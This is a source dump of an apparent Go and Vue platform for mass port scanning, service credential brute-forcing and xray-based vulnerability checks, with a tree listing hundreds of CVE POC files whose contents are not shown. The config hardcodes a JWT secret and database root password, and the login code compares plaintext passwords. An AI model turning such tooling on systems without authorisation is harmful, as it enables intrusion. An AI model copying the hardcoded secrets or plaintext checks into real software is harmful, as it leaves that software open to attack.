├── .gitignore ├── Dockerfile ├── README.md ├── config.yaml ├── configs ├── config.yaml ├── ip.txt ├── pass.txt └── user.txt ├── docker-compose.yml ├── global └── setting.go ├── go.mod ├── go.sum ├── img ├── ChangeLog.md ├── Finger.md ├── addtask.png ├── docker.png ├── docker2.png ├── finger.gif ├── index.gif ├── ip.png ├── login.png ├── setting.gif ├── task-de.png ├── task.gif ├── xray-poc.png └── xray.png ├── linglong ├── main.go ├── middleware └── jwt │ └── jwt.go ├── models ├── Iplist.go ├── auth.go ├── finger.go ├── log.go ├── models.go ├── portbrute.go ├── setting.go ├── task.go ├── tasklog.go ├── webloginlist.go └── xrayres.go ├── mysql ├── Dockerfile ├── init.sql └── my.cnf ├── pkg ├── brute │ └── brute.go ├── common │ ├── common.go │ ├── file.go │ └── var.go ├── e │ ├── code.go │ └── msg.go ├── jobs │ ├── cron.go │ ├── init.go │ └── job.go ├── plugins │ ├── ftp.go │ ├── mongodb.go │ ├── mssql.go │ ├── mysql.go │ ├── plugins.go │ ├── postgres.go │ ├── redis.go │ ├── smb.go │ └── ssh.go ├── pocs │ ├── activemq-cve-2016-3088.yml │ ├── activemq-default-password.yml │ ├── airflow-unauth.yml │ ├── alibaba-nacos-v1-auth-bypass.yml │ ├── apache-flink-upload-rce.yml │ ├── apache-kylin-unauth-cve-2020-13937.yml │ ├── apache-ofbiz-cve-2018-8033-xxe.yml │ ├── apache-ofbiz-cve-2020-9496-xml-deserialization.yml │ ├── aspcms-backend-leak.yml │ ├── bash-cve-2014-6271.yml │ ├── bt742-pma-unauthorized-access.yml │ ├── cacti-weathermap-file-write.yml │ ├── chinaunicom-modem-default-password.yml │ ├── cisco-cve-2020-3452-readfile.yml │ ├── citrix-cve-2019-19781-path-traversal.yml │ ├── citrix-cve-2020-8191-xss.yml │ ├── citrix-cve-2020-8193-unauthorized.yml │ ├── citrix-xenmobile-cve-2020-8209.yml │ ├── coldfusion-cve-2010-2861-lfi.yml │ ├── confluence-cve-2015-8399.yml │ ├── confluence-cve-2019-3396-lfi.yml │ ├── consul-rexec-rce.yml │ ├── consul-service-rce.yml │ ├── coremail-cnvd-2019-16798.yml │ ├── couchcms-cve-2018-7662.yml │ ├── couchdb-cve-2017-12635.yml │ ├── couchdb-unauth.yml │ ├── craftcms-seomatic-cve-2020-9757-rce.yml │ ├── dedecms-carbuyaction-fileinclude.yml │ ├── dedecms-cve-2018-6910.yml │ ├── dedecms-cve-2018-7700-rce.yml │ ├── dedecms-guestbook-sqli.yml │ ├── dedecms-membergroup-sqli.yml │ ├── dedecms-url-redirection.yml │ ├── discuz-ml3x-cnvd-2019-22239.yml │ ├── discuz-v72-sqli.yml │ ├── discuz-wechat-plugins-unauth.yml │ ├── discuz-wooyun-2010-080723.yml │ ├── dlink-850l-info-leak.yml │ ├── dlink-cve-2019-16920-rce.yml │ ├── dlink-cve-2019-17506.yml │ ├── dlink-cve-2020-9376-dump-credentials.yml │ ├── dlink-dsl-2888a-rce.yml │ ├── docker-api-unauthorized-rce.yml │ ├── docker-registry-api-unauth.yml │ ├── dotnetcms-sqli.yml │ ├── draytek-cve-2020-8515.yml │ ├── druid-monitor-unauth.yml │ ├── drupal-cve-2014-3704-sqli.yml │ ├── drupal-cve-2018-7600-rce.yml │ ├── drupal-cve-2019-6340.yml │ ├── duomicms-sqli.yml │ ├── dvr-cve-2018-9995.yml │ ├── ecology-filedownload-directory-traversal.yml │ ├── ecology-javabeanshell-rce.yml │ ├── ecology-springframework-directory-traversal.yml │ ├── ecology-syncuserinfo-sqli.yml │ ├── ecology-validate-sqli.yml │ ├── ecology-workflowcentertreedata-sqli.yml │ ├── ecshop-cnvd-2020-58823-sqli.yml │ ├── ecshop-rce.yml │ ├── elasticsearch-cve-2014-3120.yml │ ├── elasticsearch-cve-2015-1427.yml │ ├── elasticsearch-cve-2015-3337-lfi.yml │ ├── elasticsearch-unauth.yml │ ├── etcd-unauth.yml │ ├── etouch-v2-sqli.yml │ ├── f5-tmui-cve-2020-5902-rce.yml │ ├── fangweicms-sqli.yml │ ├── feifeicms-lfr.yml │ ├── finecms-sqli.yml │ ├── finereport-directory-traversal.yml │ ├── flexpaper-cve-2018-11686.yml │ ├── flink-jobmanager-cve-2020-17519-lfi.yml │ ├── fortigate-cve-2018-13379-readfile.yml │ ├── frp-dashboard-unauth.yml │ ├── gilacms-cve-2020-5515.yml │ ├── glassfish-cve-2017-1000028-lfi.yml │ ├── go-pprof-leak.yml │ ├── h2-database-web-console-unauthorized-access.yml │ ├── hadoop-yarn-unauth.yml │ ├── harbor-cve-2019-16097.yml │ ├── hikvision-cve-2017-7921.yml │ ├── ifw8-router-cve-2019-16313.yml │ ├── influxdb-unauth.yml │ ├── jboss-cve-2010-1871.yml │ ├── jboss-unauth.yml │ ├── jenkins-cve-2018-1000600.yml │ ├── jenkins-cve-2018-1000861-rce.yml │ ├── jenkins-unauthorized-access.yml │ ├── jira-cve-2019-11581.yml │ ├── jira-cve-2019-8442.yml │ ├── jira-cve-2019-8449.yml │ ├── jira-cve-2020-14179.yml │ ├── jira-cve-2020-14181.yml │ ├── jira-ssrf-cve-2019-8451.yml │ ├── joomla-cnvd-2019-34135-rce.yml │ ├── joomla-component-vreview-sql.yml │ ├── joomla-cve-2015-7297-sqli.yml │ ├── joomla-cve-2017-8917-sqli.yml │ ├── joomla-cve-2018-7314-sql.yml │ ├── joomla-ext-zhbaidumap-cve-2018-6605-sqli.yml │ ├── jumpserver-unauth-rce.yml │ ├── jupyter-notebook-unauthorized-access.yml │ ├── kafka-manager-unauth.yml │ ├── kibana-cve-2018-17246.yml │ ├── kibana-unauth.yml │ ├── kong-cve-2020-11710-unauth.yml │ ├── lanproxy-cve-2021-3019-lfi.yml │ ├── laravel-debug-info-leak.yml │ ├── laravel-improper-webdir.yml │ ├── maccms-rce.yml │ ├── maccmsv10-backdoor.yml │ ├── metinfo-cve-2019-16996-sqli.yml │ ├── metinfo-cve-2019-16997-sqli.yml │ ├── metinfo-cve-2019-17418-sqli.yml │ ├── metinfo-lfi-cnvd-2018-13393.yml │ ├── minio-default-password.yml │ ├── mongo-express-cve-2019-10758.yml │ ├── msvod-sqli.yml │ ├── myucms-lfr.yml │ ├── nagio-cve-2018-10735.yml │ ├── nagio-cve-2018-10736.yml │ ├── nagio-cve-2018-10737.yml │ ├── nagio-cve-2018-10738.yml │ ├── netgear-cve-2017-5521.yml │ ├── nextjs-cve-2017-16877.yml │ ├── nexus-cve-2019-7238.yml │ ├── nexus-cve-2020-10199.yml │ ├── nexus-cve-2020-10204.yml │ ├── nexus-default-password.yml │ ├── nexusdb-cve-2020-24571-path-traversal.yml │ ├── nhttpd-cve-2019-16278.yml │ ├── nps-default-password.yml │ ├── nsfocus-uts-password-leak.yml │ ├── nuuo-file-inclusion.yml │ ├── openfire-cve-2019-18394-ssrf.yml │ ├── opentsdb-cve-2020-35476-rce.yml │ ├── pandorafms-cve-2019-20224-rce.yml │ ├── php-cgi-cve-2012-1823.yml │ ├── phpcms-cve-2018-19127.yml │ ├── phpmyadmin-cve-2018-12613-file-inclusion.yml │ ├── phpmyadmin-setup-deserialization.yml │ ├── phpok-sqli.yml │ ├── phpshe-sqli.yml │ ├── phpstudy-backdoor-rce.yml │ ├── phpstudy-nginx-wrong-resolve.yml │ ├── phpunit-cve-2017-9841-rce.yml │ ├── powercreator-arbitrary-file-upload.yml │ ├── pulse-cve-2019-11510.yml │ ├── pyspider-unauthorized-access.yml │ ├── qibocms-sqli.yml │ ├── qnap-cve-2019-7192.yml │ ├── rails-cve-2018-3760-rce.yml │ ├── razor-cve-2018-8770.yml │ ├── rconfig-cve-2019-16663.yml │ ├── resin-cnnvd-200705-315.yml │ ├── resin-inputfile-fileread-or-ssrf.yml │ ├── resin-viewfile-fileread.yml │ ├── ruijie-eg-rce.yml │ ├── saltstack-cve-2020-16846.yml │ ├── samsung-wea453e-default-pwd.yml │ ├── samsung-wea453e-rce.yml │ ├── sangfor-edr-arbitrary-admin-login.yml │ ├── sangfor-edr-cssp-rce.yml │ ├── sangfor-edr-tool-rce.yml │ ├── satellian-cve-2020-7980-rce.yml │ ├── seacms-before-v992-rce.yml │ ├── seacms-rce.yml │ ├── seacms-sqli.yml │ ├── seacms-v654-rce.yml │ ├── seacmsv645-command-exec.yml │ ├── seeyon-ajax-unauthorized-access.yml │ ├── seeyon-cnvd-2020-62422-readfile.yml │ ├── seeyon-wooyun-2015-0108235-sqli.yml │ ├── seeyon-wooyun-2015-148227.yml │ ├── solarwinds-cve-2020-10148.yml │ ├── solr-cve-2017-12629-xxe.yml │ ├── solr-cve-2019-0193.yml │ ├── solr-velocity-template-rce.yml │ ├── sonarqube-cve-2020-27986-unauth.yml │ ├── sonicwall-ssl-vpn-rce.yml │ ├── spark-api-unauth.yml │ ├── spark-webui-unauth.yml │ ├── spring-cloud-cve-2020-5405.yml │ ├── spring-cloud-cve-2020-5410.yml │ ├── spring-cve-2016-4977.yml │ ├── springboot-env-unauth.yml │ ├── springcloud-cve-2019-3799.yml │ ├── supervisord-cve-2017-11610.yml │ ├── tensorboard-unauth.yml │ ├── terramaster-cve-2020-15568.yml │ ├── terramaster-cve-2020-28188-rce.yml │ ├── thinkadmin-v6-readfile.yml │ ├── thinkcmf-lfi.yml │ ├── thinkcmf-write-shell.yml │ ├── thinkphp-v6-file-write.yml │ ├── thinkphp5-controller-rce.yml │ ├── thinkphp5023-method-rce.yml │ ├── tomcat-cve-2017-12615-rce.yml │ ├── tomcat-cve-2018-11759.yml │ ├── tongda-meeting-unauthorized-access.yml │ ├── tpshop-sqli.yml │ ├── typecho-rce.yml │ ├── ueditor-cnvd-2017-20077-file-upload.yml │ ├── uwsgi-cve-2018-7490.yml │ ├── vbulletin-cve-2019-16759-bypass.yml │ ├── vbulletin-cve-2019-16759.yml │ ├── vmware-vcenter-arbitrary-file-read.yml │ ├── weaver-ebridge-file-read.yml │ ├── weblogic-cve-2017-10271.yml │ ├── weblogic-cve-2019-2725.yml │ ├── weblogic-cve-2019-2729-1.yml │ ├── weblogic-cve-2019-2729-2.yml │ ├── weblogic-cve-2020-14750.yml │ ├── weblogic-ssrf.yml │ ├── webmin-cve-2019-15107-rce.yml │ ├── wordpress-cve-2019-19985-infoleak.yml │ ├── wordpress-ext-adaptive-images-lfi.yml │ ├── wordpress-ext-mailpress-rce.yml │ ├── wuzhicms-v410-sqli.yml │ ├── xiuno-bbs-cvnd-2019-01348-reinstallation.yml │ ├── xunchi-cnvd-2020-23735-file-read.yml │ ├── yccms-rce.yml │ ├── yonyou-grp-u8-sqli-to-rce.yml │ ├── yonyou-grp-u8-sqli.yml │ ├── yonyou-nc-arbitrary-file-upload.yml │ ├── youphptube-encoder-cve-2019-5127.yml │ ├── youphptube-encoder-cve-2019-5128.yml │ ├── youphptube-encoder-cve-2019-5129.yml │ ├── yungoucms-sqli.yml │ ├── zabbix-authentication-bypass.yml │ ├── zabbix-cve-2016-10134-sqli.yml │ ├── zcms-v3-sqli.yml │ ├── zeit-nodejs-cve-2020-5284-directory-traversal.yml │ ├── zeroshell-cve-2019-12725-rce.yml │ ├── zimbra-cve-2019-9670-xxe.yml │ └── zzcms-zsmanage-sqli.yml ├── setting │ ├── section.go │ └── setting.go ├── third │ └── xray_linux_amd64 ├── utils.go └── utils │ ├── jwt.go │ └── pagination.go ├── routers ├── api │ ├── auth.go │ └── v1 │ │ ├── Iplist.go │ │ ├── alyaze │ │ ├── jobdesc.go │ │ ├── wappalyze.go │ │ └── webanalyze.go │ │ ├── finger.go │ │ ├── log.go │ │ ├── portbrute.go │ │ ├── setting.go │ │ ├── task.go │ │ ├── tasklog.go │ │ ├── webloginlist.go │ │ └── xrayres.go ├── router.go └── tools │ ├── masscan │ └── masscan.go │ └── nmap │ └── nmap.go ├── web ├── .env ├── Dockerfile ├── babel.config.js ├── dist │ ├── 12.png │ ├── css │ │ ├── app.3d466215.css │ │ └── chunk-vendors.2ac5db4b.css │ ├── favicon.ico │ ├── fonts │ │ ├── element-icons.535877f5.woff │ │ └── element-icons.732389de.ttf │ ├── img │ │ ├── all.ba8c4734.png │ │ ├── bg.8e171a3c.png │ │ ├── iconfont.82d03b7e.svg │ │ ├── ipall.777d2626.png │ │ └── logo.46db48c9.png │ ├── index.html │ └── js │ │ ├── app.4dccb236.js │ │ ├── app.4dccb236.js.map │ │ ├── chunk-vendors.cc02a279.js │ │ └── chunk-vendors.cc02a279.js.map ├── nginx.conf ├── package-lock.json ├── package.json ├── public │ ├── 12.png │ ├── favicon.ico │ └── index.html ├── server-config.js ├── src │ ├── App.vue │ ├── assets │ │ ├── all.png │ │ ├── css │ │ │ └── global.css │ │ ├── fonts │ │ │ ├── demo.css │ │ │ ├── demo_fontclass.html │ │ │ ├── demo_symbol.html │ │ │ ├── demo_unicode.html │ │ │ ├── iconfont.css │ │ │ ├── iconfont.eot │ │ │ ├── iconfont.js │ │ │ ├── iconfont.svg │ │ │ ├── iconfont.ttf │ │ │ └── iconfont.woff │ │ ├── img │ │ │ ├── bg.png │ │ │ └── btn.png │ │ ├── ipall.png │ │ ├── login.png │ │ ├── logo.png │ │ └── vuln.png │ ├── components │ │ ├── HelloWorld.vue │ │ ├── Home.vue │ │ ├── Login.vue │ │ ├── Welcome.vue │ │ ├── finger │ │ │ └── finger.vue │ │ ├── jobips │ │ │ └── Jobips.vue │ │ ├── log │ │ │ └── Log.vue │ │ ├── modpass │ │ │ └── Modpass.vue │ │ ├── setting │ │ │ └── Setting.vue │ │ ├── task │ │ │ ├── Task.vue │ │ │ └── Tasklog.vue │ │ ├── webloginlist │ │ │ └── Webloginlist.vue │ │ └── xrayres │ │ │ └── Xrayres.vue │ ├── main.js │ ├── plugins │ │ └── element.js │ ├── router │ │ └── index.js │ └── views │ │ ├── About.vue │ │ └── Home.vue └── vue.config.js └── 漏洞报告.xlsx /.gitignore: -------------------------------------------------------------------------------- 1 | # local env files 2 | .env.local 3 | .env.*.local 4 | 5 | .codelog 6 | /web/node_modules/ 7 | /pkg/third/xray_darwin_amd64 8 | /img/linglong-21-02-22(compose版).zip 9 | 10 | # Editor directories and files 11 | .idea 12 | .vscode 13 | *.suo 14 | *.ntvs* 15 | *.njsproj 16 | *.sln 17 | *.sw 18 | 19 | i# General 20 | .DS_Store 21 | .AppleDouble 22 | .LSOverride 23 | 24 | # Icon must end with two \r 25 | Icon 26 | 27 | # Thumbnails 28 | ._* 29 | 30 | # Files that might appear in the root of a volume 31 | .DocumentRevisions-V100 32 | .fseventsd 33 | .Spotlight-V100 34 | .TemporaryItems 35 | .Trashes 36 | .VolumeIcon.icns 37 | .com.apple.timemachine.donotpresent 38 | 39 | # Directories potentially created on remote AFP share 40 | .AppleDB 41 | .AppleDesktop 42 | Network Trash Folder 43 | Temporary Items 44 | .apdisk 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:16.04 2 | 3 | MAINTAINER drunk_kk 4 | 5 | ENV LC_ALL C.UTF-8 6 | ENV TZ=Asia/Shanghai 7 | RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone 8 | 9 | RUN sed -i 's/archive.ubuntu.com/mirrors.aliyun.com/g' /etc/apt/sources.list 10 | 11 | RUN set -x \ 12 | && apt-get clean \ 13 | && apt-get update -y \ 14 | && apt-get install -y nmap masscan 15 | 16 | WORKDIR /build 17 | 18 | ENV GO111MODULE=on \ 19 | CGO_ENABLED=0 \ 20 | GOOS=linux \ 21 | GOARCH=amd64 22 | 23 | COPY . . 24 | 25 | EXPOSE 18000 26 | 27 | CMD ["./linglong"] 28 | 29 | -------------------------------------------------------------------------------- /configs/config.yaml: -------------------------------------------------------------------------------- 1 | Server: 2 | RunMode: debug 3 | HttpPort: 18000 4 | ReadTimeout: 60 5 | WriteTimeout: 60 6 | App: 7 | DefaultPageSize: 10 8 | MaxPageSize: 100 9 | DefaultContextTimeout: 60 10 | JwtSecret: fas65fd4541e352231a#D12 11 | PortUserDict: ./configs/user.txt 12 | PortPassDict: ./configs/pass.txt 13 | Database: 14 | DBType: mysql 15 | UserName: root 16 | Password: linglong8s 17 | Host: mysql 18 | # Host: 127.0.0.1:3306 19 | DBName: linglong 20 | TablePrefix: 21 | Charset: utf8 22 | ParseTime: True 23 | MaxIdleConns: 10 24 | MaxOpenConns: 30 25 | -------------------------------------------------------------------------------- /configs/ip.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/configs/ip.txt -------------------------------------------------------------------------------- /configs/user.txt: -------------------------------------------------------------------------------- 1 | root 2 | -------------------------------------------------------------------------------- /docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | services: 3 | mysql: 4 | build: ./mysql 5 | environment: 6 | - TZ=Asia/Shanghai 7 | - MYSQL_DATABASE=linglong 8 | - MYSQL_ROOT_PASSWORD=linglong8s 9 | ports: 10 | - "3305:3306" 11 | restart: always 12 | command: [ 13 | '--character-set-server=utf8mb4', 14 | '--collation-server=utf8mb4_unicode_ci', 15 | ] 16 | server: 17 | container_name: 'linglong-server' 18 | build: . 19 | ports: 20 | - "18000:18000" 21 | links: 22 | - mysql:mysql 23 | depends_on: 24 | - mysql 25 | restart: always 26 | environment: 27 | - TZ=Asia/Shanghai 28 | web: 29 | container_name: 'linglong-web' 30 | restart: always 31 | build: ./web 32 | ports: 33 | - 8001:8001 34 | # volumes: 35 | # - ./nginx.conf:/etc/nginx/nginx.conf 36 | depends_on: 37 | - server 38 | -------------------------------------------------------------------------------- /global/setting.go: -------------------------------------------------------------------------------- 1 | package global 2 | 3 | import "linglong/pkg/setting" 4 | 5 | var ( 6 | ServerSetting *setting.ServerSettingS 7 | AppSetting *setting.AppSettingS 8 | DatabaseSetting *setting.DatabaseSettingS 9 | MasscanSetting *setting.MasscanSettingS 10 | ) 11 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module linglong 2 | 3 | go 1.14 4 | 5 | require ( 6 | github.com/360EntSecGroup-Skylar/excelize v1.4.1 7 | github.com/PuerkitoBio/goquery v1.5.1 8 | github.com/Ullaakut/nmap v2.0.0+incompatible 9 | github.com/astaxie/beego v1.12.2 10 | github.com/axgle/mahonia v0.0.0-20180208002826-3358181d7394 11 | github.com/bobesa/go-domain-util v0.0.0-20190911083921-4033b5f7dd89 12 | github.com/denisenkom/go-mssqldb v0.0.0-20191124224453-732737034ffd 13 | github.com/dgrijalva/jwt-go v3.2.0+incompatible 14 | github.com/fatih/color v1.7.0 15 | github.com/fvbock/endless v0.0.0-20170109170031-447134032cb6 16 | github.com/gin-gonic/gin v1.6.3 17 | github.com/go-redis/redis v6.14.2+incompatible 18 | github.com/gogf/gf v1.13.3 19 | github.com/jinzhu/gorm v1.9.16 20 | github.com/jlaffaye/ftp v0.0.0-20200812143550-39e3779af0db 21 | github.com/jteeuwen/go-bindata v3.0.7+incompatible // indirect 22 | github.com/lib/pq v1.1.1 23 | github.com/lisijie/cron v0.0.0-20151225081149-1c5ac61b9f22 24 | github.com/malfunkt/iprange v0.9.0 25 | github.com/mattn/go-colorable v0.1.7 // indirect 26 | github.com/netxfly/mysql v1.0.3 27 | github.com/robfig/cron/v3 v3.0.0 28 | github.com/spf13/viper v1.7.1 29 | github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8 30 | github.com/unknwon/com v1.0.1 31 | golang.org/x/crypto v0.0.0-20191205180655-e7c4368fe9dd 32 | gopkg.in/mgo.v2 v2.0.0-20190816093944-a6b53ec6cb22 33 | ) 34 | -------------------------------------------------------------------------------- /img/ChangeLog.md: -------------------------------------------------------------------------------- 1 | 2 | > 记录一些更新日志 3 | 4 | - [x] [2021-0210] 指纹资产管理、增删改查 5 | - [x] [2021-0210] 优化资产的查询方式 6 | - [x] [2021-0213] 发现资产POC自动扫描、扫描结果界面查看、删除 7 | - [x] [2021-0214] 密码修改功能,关闭Xray-server-error 8 | - [x] [2021-0215] Docker折腾了好久 9 | - [x] [2021-0225] 更新docker-compose的部署方式 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /img/Finger.md: -------------------------------------------------------------------------------- 1 | 2 | > 指纹是Json格式,如下指纹案例 3 | 4 | ```json 5 | "Shiro": { 6 | "cookies": { 7 | "rememberMe": "" 8 | } 9 | } 10 | ``` 11 | 12 | ```json 13 | "PHPMyAdmin": { 14 | "html": "phpMyAdmin ", 15 | "html": "/themes/pmahomme/img/logo_right.png" 16 | } 17 | ``` 18 | 19 | ```json 20 | "Kibana": { 21 | "headers": { 22 | "kbn-name": "kibana", 23 | "kbn-version": "^([\\d.]+)$\\;version:\\1" 24 | }, 25 | "html": "Kibana" 26 | } 27 | ``` 28 | 29 | 30 | | 参数 | 说明 | 31 | | :-------------------- | :----------------------------------------------------------- | 32 | | html | 正则匹配网页的html | 33 | | headers | 正则匹配网页的headers | 34 | | cookies | 正则匹配网页的cookies | 35 | -------------------------------------------------------------------------------- /img/addtask.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/addtask.png -------------------------------------------------------------------------------- /img/docker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/docker.png -------------------------------------------------------------------------------- /img/docker2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/docker2.png -------------------------------------------------------------------------------- /img/finger.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/finger.gif -------------------------------------------------------------------------------- /img/index.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/index.gif -------------------------------------------------------------------------------- /img/ip.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/ip.png -------------------------------------------------------------------------------- /img/login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/login.png -------------------------------------------------------------------------------- /img/setting.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/setting.gif -------------------------------------------------------------------------------- /img/task-de.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/task-de.png -------------------------------------------------------------------------------- /img/task.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/task.gif -------------------------------------------------------------------------------- /img/xray-poc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/xray-poc.png -------------------------------------------------------------------------------- /img/xray.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/img/xray.png -------------------------------------------------------------------------------- /linglong: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/linglong -------------------------------------------------------------------------------- /middleware/jwt/jwt.go: -------------------------------------------------------------------------------- 1 | package jwt 2 | 3 | import ( 4 | "github.com/gin-gonic/gin" 5 | "linglong/pkg/e" 6 | "linglong/pkg/utils" 7 | "net/http" 8 | "time" 9 | ) 10 | 11 | func JWT() gin.HandlerFunc { 12 | return func(c *gin.Context) { 13 | var code int 14 | var data interface{} 15 | 16 | code = e.SUCCESS 17 | token := c.GetHeader("Authorization") 18 | 19 | if token == "" { 20 | code = e.INVALID_PARAMS 21 | } else { 22 | claims, err := utils.ParseToken(token) 23 | if claims == nil{ 24 | c.JSON(http.StatusUnauthorized, gin.H{ 25 | "code" : 401, 26 | "msg" : "cookie失效,请点击右上角退出重新登陆", 27 | "data" : data, 28 | }) 29 | c.Abort() 30 | return 31 | } 32 | if err != nil { 33 | code = e.ERROR 34 | } else if time.Now().Unix() > claims.ExpiresAt { 35 | code =e.ERROR 36 | } 37 | } 38 | 39 | if code != e.SUCCESS { 40 | c.JSON(http.StatusUnauthorized, gin.H{ 41 | "code" : code, 42 | "msg" : e.GetMsg(code), 43 | "data" : data, 44 | }) 45 | 46 | c.Abort() 47 | return 48 | } 49 | 50 | c.Next() 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /models/auth.go: -------------------------------------------------------------------------------- 1 | package models 2 | 3 | type Auth struct { 4 | ID int `gorm:"primary_key" json:"id"` 5 | Username string `json:"username"` 6 | Password string `json:"password"` 7 | } 8 | 9 | func CheckAuth(username, password string) bool { 10 | var auth Auth 11 | db.Select("id").Where(Auth{Username: username, Password: password}).First(&auth) 12 | if auth.ID > 0 { 13 | return true 14 | } 15 | 16 | return false 17 | } 18 | 19 | func EditAuth(name string,data interface{}) bool { 20 | db.Model(&Auth{}).Where("username = ? ",name).Updates(data) 21 | return true 22 | } 23 | -------------------------------------------------------------------------------- /models/models.go: -------------------------------------------------------------------------------- 1 | package models 2 | 3 | import ( 4 | "fmt" 5 | "linglong/global" 6 | "log" 7 | "github.com/jinzhu/gorm" 8 | _ "github.com/jinzhu/gorm/dialects/mysql" 9 | ) 10 | 11 | var db *gorm.DB 12 | 13 | type Model struct { 14 | ID int `gorm:"primary_key" json:"id"` 15 | } 16 | 17 | 18 | func Setup() { 19 | var err error 20 | db, err = gorm.Open(global.DatabaseSetting.DBType, fmt.Sprintf("%s:%s@tcp(%s)/%s?charset=utf8&parseTime=True&loc=Local", 21 | global.DatabaseSetting.UserName, 22 | global.DatabaseSetting.Password, 23 | global.DatabaseSetting.Host, 24 | global.DatabaseSetting.DBName)) 25 | 26 | if err != nil { 27 | log.Fatalf("models.Setup err: %v", err) 28 | } 29 | 30 | gorm.DefaultTableNameHandler = func(db *gorm.DB, defaultTableName string) string { 31 | return global.DatabaseSetting.TablePrefix + defaultTableName 32 | } 33 | 34 | db.SingularTable(true) 35 | db.LogMode(true) 36 | } 37 | -------------------------------------------------------------------------------- /models/setting.go: -------------------------------------------------------------------------------- 1 | package models 2 | 3 | type Setting struct { 4 | *Model 5 | Ip string `json:"ip"` 6 | LoginWord string `json:"login_word"` 7 | LoginUrl string `json:"login_url"` 8 | MasscanThred int `json:"masscan_thred"` 9 | MasscanDeltime int `json:"masscan_deltime"` 10 | MasscanIp string `json:"masscan_ip"` 11 | MasscanPort string `json:"masscan_port"` 12 | MasscanWhite string `json:"masscan_white"` 13 | CreatedTime string `json:"created_time"` 14 | UpdatedTime string `json:"updated_time"` 15 | } 16 | 17 | func GetSetting(pageNum int, pageSize int, maps interface{}) (setting []Setting) { 18 | db.Where(maps).First(&setting) 19 | return 20 | } 21 | 22 | func GetSettingTotal(maps interface{}) (count int) { 23 | db.Model(&Setting{}).Where(maps).Count(&count) 24 | return 25 | } 26 | 27 | func EditSetting(data interface{}) bool { 28 | db.Model(&Setting{}).Updates(data) 29 | return true 30 | } 31 | 32 | //根据条件获取全部资产爆破 33 | func GetSettingTitle() (setting []Setting) { 34 | db.First(&setting) 35 | return 36 | } 37 | -------------------------------------------------------------------------------- /mysql/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM mysql:5.7 2 | COPY ./init.sql /docker-entrypoint-initdb.d -------------------------------------------------------------------------------- /mysql/my.cnf: -------------------------------------------------------------------------------- 1 | [mysqld] 2 | user=mysql 3 | default-storage-engine=INNODB 4 | character-set-server=utf8 5 | [client] 6 | default-character-set=utf8 7 | [mysql] 8 | default-character-set=utf8 9 | -------------------------------------------------------------------------------- /pkg/common/var.go: -------------------------------------------------------------------------------- 1 | package common 2 | 3 | import ( 4 | "linglong/models" 5 | "strings" 6 | "sync" 7 | ) 8 | 9 | var ( 10 | Mutex sync.Mutex 11 | 12 | PortNames = map[int]string{ 13 | 21: "FTP", 14 | 22: "SSH", 15 | 161: "SNMP", 16 | 445: "SMB", 17 | 1433: "MSSQL", 18 | 3306: "MYSQL", 19 | 5432: "POSTGRESQL", 20 | 6379: "REDIS", 21 | 9200: "ELASTICSEARCH", 22 | 27017: "MONGODB", 23 | } 24 | 25 | SupportProtocols map[string]bool 26 | 27 | BruteResult map[string]models.Service 28 | ) 29 | 30 | func init() { 31 | 32 | BruteResult = make(map[string]models.Service) 33 | 34 | SupportProtocols = make(map[string]bool) 35 | for _, proto := range PortNames { 36 | SupportProtocols[strings.ToUpper(proto)] = true 37 | } 38 | 39 | } 40 | -------------------------------------------------------------------------------- /pkg/e/code.go: -------------------------------------------------------------------------------- 1 | package e 2 | 3 | const ( 4 | SUCCESS = 200 5 | ERROR = 500 6 | INVALID_PARAMS = 400 7 | INVALID_PASS = 402 8 | INVALID_FINGER = 405 9 | 10 | INVALID_DIFFPASS = 403 11 | 12 | 13 | ERROR_CRON_SPEC = 10001 14 | 15 | ) 16 | -------------------------------------------------------------------------------- /pkg/e/msg.go: -------------------------------------------------------------------------------- 1 | package e 2 | 3 | 4 | var MsgFlags = map[int]string { 5 | SUCCESS : "请求成功", 6 | ERROR : "请求失败", 7 | INVALID_PARAMS : "请求参数错误", 8 | INVALID_PASS : "旧密码错误", 9 | INVALID_DIFFPASS : "两次新密码不一致", 10 | INVALID_FINGER : "需要去掉指纹尾部逗号", 11 | 12 | 13 | ERROR_CRON_SPEC : "crontab语法错误", 14 | 15 | } 16 | 17 | func GetMsg(code int) string { 18 | msg, ok := MsgFlags[code] 19 | if ok { 20 | return msg 21 | } 22 | 23 | return MsgFlags[ERROR] 24 | } 25 | 